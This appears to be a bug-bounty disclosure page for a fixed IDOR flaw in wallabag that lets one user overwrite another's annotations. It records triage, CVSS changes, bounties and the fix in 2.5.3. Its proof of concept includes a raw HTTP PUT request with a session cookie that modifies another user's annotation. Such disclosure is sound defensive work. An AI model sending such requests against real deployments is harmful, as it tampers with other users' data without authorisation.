IDOR vulnerability allowing to update another user's annotations in wallabag/wallabag

Valid

Reported on

Jan 22nd 2023

Description

IDOR vulnerability was discovered in wallabag.

Proof of Concept

  1. Login as a victim.
  2. Create an entry and an annotation. In this case the annotation's ID is 3.
  3. Login as an attacker.
  4. Send the following request.

request

PUT /annotations/3 HTTP/1.1
Host: localhost:8000
Cookie: PHPSESSID=e23e2dfc1b530c1884bf17248448b979
Content-Length: 21

{"id":3,"text":"xxx"}
  1. Victim's annotation created on step 2 is updated.

Impact

An attacker can update another user's annotations.

We are processing your report and will contact the wallabag team within 24 hours. 2 months ago
We have contacted a member of the wallabag team and are waiting to hear back 2 months ago
wallabag/wallabag maintainer has acknowledged this report 2 months ago
Kevin Decherf modified the Severity from Medium (4.3) to Medium (5.4) 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Kevin Decherf validated this vulnerability 2 months ago

Changing CVSS score to 5.4 as there is a limited loss of confidentiality. Response from the call returns the annotated text

bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Kevin Decherf marked this as fixed in 2.5.3 with commit 5ac6b6 2 months ago
Kevin Decherf has been awarded the fix bounty
This vulnerability has been assigned a CVE
Kevin Decherf published this vulnerability 2 months ago
wallabag/wallabag maintainer gave praise 2 months ago
Thank you!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation